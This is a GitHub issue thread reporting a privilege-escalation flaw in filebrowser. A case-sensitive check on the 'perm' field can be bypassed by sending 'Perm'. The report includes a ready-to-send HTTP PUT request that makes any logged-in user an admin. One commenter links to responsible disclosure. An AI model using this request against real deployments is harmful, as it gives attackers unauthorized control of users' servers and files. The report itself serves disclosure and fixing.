### ISSUE TITLE
Security vulnerability that allows anyone to become admin

### ISSUE THREAD

**Issue by xmcp** [filebrowser/filebrowser#1195]
**Description**
Any user can gain admin privilege by changing permission field, due to broken checking logic in `http/users.go`.

**Expected behaviour**
Certainly they shouldn't.

**What is happening instead?**
They actually did become admin.

**Additional context**
Currently the backend logic checks for `(v == "scope" || v == "perm" || v == "username")` to avoid users changing permission for themselves. But this is not enough, because the `v` is converted to title case (`strings.Title(v)`) before it is written into database.
Therefore, a malicious user can use arguments like `Perm` to effectively bypass this checking.

**How to reproduce?**
```http
PUT /api/users/<your_uid> HTTP/1.1
X-Auth: xxxxx
Content-Type: text/plain;charset=UTF-8

{"what":"user","which":["Perm"],"data":{"id":<your_uid>,"Perm":{"admin":true,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true}}}
```

**Files**
No files for this issue :)

**Comment by RealOrangeOne** [comment]
https://en.wikipedia.org/wiki/Responsible_disclosure
